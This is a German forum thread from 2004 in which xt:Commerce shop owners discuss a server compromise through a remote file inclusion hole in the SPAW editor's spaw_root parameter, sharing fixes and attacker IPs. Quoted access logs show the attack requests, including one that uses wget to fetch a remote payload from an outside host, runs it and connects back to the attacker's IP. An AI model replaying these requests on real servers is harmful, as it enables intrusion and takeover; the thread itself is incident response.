Serverhack ?ber Xtc M?glich.

[celeron]

Hallo,

heute Nacht wurde unser Server (1&1 ManagedServer) gehackt. Der Einstieg wurde lat Logdatei aus einem XTC Shop vorgenommen.

Bitte die XTC Admins mit mir in Verbindung zusetzen.

Hier scheint ein gro?es Sicherheitloch zu existieren.

Ich sende Euch dann die Logdatei zu.

Gru?

celeron

[celeron]

?ber die Datei GET /admin/includes/classes/spaw/spaw_control.class.php?spaw_root ist es dem Angreifer m?glich Zugriff auf den Server zu bekommen.

Soweit mal der letzte Stand.

Gru?

celeron

[Matthias]

HI,

meinen Shop hats auch mit erwischt, so wie es aussieht hat der Angreifer aber keinerlei Schaden gemacht sondern nur den Hinweis hinterlassen das er da war.

mfg Matthias

[celeron]

Schaden hat er bei uns in der Hinsicht auch nicht angestellt. Nur bei ?ber 100 Kundenseiten die Index.HTML Seite mit Seiner Visitenkarte ?berschrieben.

Gru?

celeron

[mobilland]

bei mir ist auch nichts passiert

[Smarti]

Hallo Leute

kann das sein das es was mit euren einstellungen von PHP zu tun hat

zb : open_basedir und Safe Mode off

gru?

Thomas

[dukie6666]

bei mir wurde die index.php mit einer leeren datei ersetzt

[mzanier]

folgende zeile in die

/admin/includes/classes/spaw/spaw_control.class.php

if (preg_match("/http:\/\//i", $spaw_root)) die ("can't include external file"); 

vor den includes einf?gen.

ich bringe gleich ein fix f?r den editor.

[celeron]

Hallo,

kannst Du uns evt. kurz Beschreiben wie der Hacker vorgegangen ist. Au?er das er wahrscheinlich die Seiten ?ber dieses Forum gefunden hat.

Hat er mit einem Script schreibrechte in anderen Verzeichnissen bekommen !!

Sind die Einstellungen open_basedir und Safe Mode off mit diesem Problem auch in Verbindung zu setzen ?

Was macht deine Fixpackage dicht ?

Gru?

celeron

[mzanier]

http://www.xt-commerce.com/modules/mydownl...p?cid=31&lid=85

[Chrysler]

wie schauts denn mit der DB aus? Du hatten ja sicherlich auch zugriff auf die configure - muss man seine passw?rter alle ?ndern?

Und k?nnten die nicht modifizierte Dateien eingespielt haben, die bspw. Passw?rter an die weitermailt?

[mzanier]

habt ihr serverlogs mit ip usw ?

es handelt sich hier mit sicherheit um einen forenuser.

[Chrysler]

200.226.6.0

[Smarti]

na super

Daten zu 200.226.6.0

Abfrage

[khan_thep]

Nat toll, kaum kommt man vom Lago di Garda Urlaub, schiesst einem die bl?sse ins Gesischt:

200.151.189.107 - - [12/Jun/2004:08:48:02 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:48:02 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:48:03 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:54:43 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:54:44 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:54:45 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:59:17 +0200] "GET /admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.averdade.org/sh.ib?&cmd=id;uname%20-a HTTP/1.1" 200 3252 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.151.189.107 - - [12/Jun/2004:08:59:35 +0200] "GET /admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.averdade.org/sh.ib?&cmd=cd%20/tmp/;wget HTTP/1.1" 200 3123 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.151.189.107 - - [12/Jun/2004:09:00:41 +0200] "GET /admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.averdade.org/sh.ib?&cmd=cd%20/tmp/;wget%20www.kfhi.or.kr/dc.txt;chmod%20711%20dc.txt;./dc.txt%20200.151.189.107%20666 HTTP/1.1"

Eingabe in den URI ergibt:

Innocent Boys Crew Warning: main(): stream does not support seeking in /home/www/web/html/admin/includes/classes/spaw/spaw_control.class.php on line 16

Sieht so aus, als ob der Server dicht gemacht h?tte.

[dukie6666]

bei mir diese ip: 201.4.113.146

Abfrage

[celeron]

Bei mir ist es auch diese gewesen 201.4.113.146.

Gru?

celeron

[Hubi]

register_globals=off w?r auch ne gute Idee f?r so manchen Server.

Ihr solltet bei eurem Hoster darauf bestehen, dass der das abschaltet. XTC arbeitet im Gegensatz zu so manch anderem Shop mit dieser einstellung, dann sollte die auch gemacht werden, zumal es der Sicherheit nur zugute kommen kann.

[khan_thep]

Eben, mit den register_globals ist das leck dicht.

Frage: der Fix besteht aus:

if (preg_match("/http:\/\//i", $spaw_root)) die ("can't include external file"); 

Die Hacker k?nnen aber auch die Files ?ber FTP reinholen!!!

[mzanier]

im fix ist ebenso eine htacess f?r das includes/ verzeichnis enthalten, dadurch kein zugriff mehr von aussen auf die files.

[khan_thep]

Klar, damit machst Du nat?rlich alles dicht.

[peteristda]

@ all

Von: World4You Internet Services GmbH [mailto:[email protected]]

Gesendet: Freitag, 04. Juni 2004 08:00

Betreff: Ihr Webserver

Sehr geehrter Kunde!

Es gab leider heute Morgen Hackangriffe auf ihren Webserver.

Deshalb kommt es im Moment zu Unterbrechungen. Wir arbeiten mit Hochdruck daran, damit ihre Website wieder online ist und bitten um Ihr Verstaendnis.

-----------

hatte dem nicht allzuviel bedeutung zugemessen, zumal war ich um 11 wieder on, lass aber mal ne mail los, dass ich n?chere infos bekomme.

lg

peter

[webkasper]

Mann o mann ...

da kann man nicht mal in Ruhe den Geburtstagskater auskurieren...

Bei mir wars auch folgende IP: 201.4.113.146

hatte auch die Index durch ne leere Index ersetzt, grgrgrg

ciao, der webkasper

[celeron]

Hallo,

gibt mal in Google "ir4dex" ein. Ihr bekommt als Suchergebniss eine unendliche Liste von gehackten Seiten.

Das sin diejenigen die unser Server gehackt haben.

Gru?

celeron

[Mickes_ast]

Hallo,

hab dazu folgenden Link gefunden Net-Friends.de

Mickes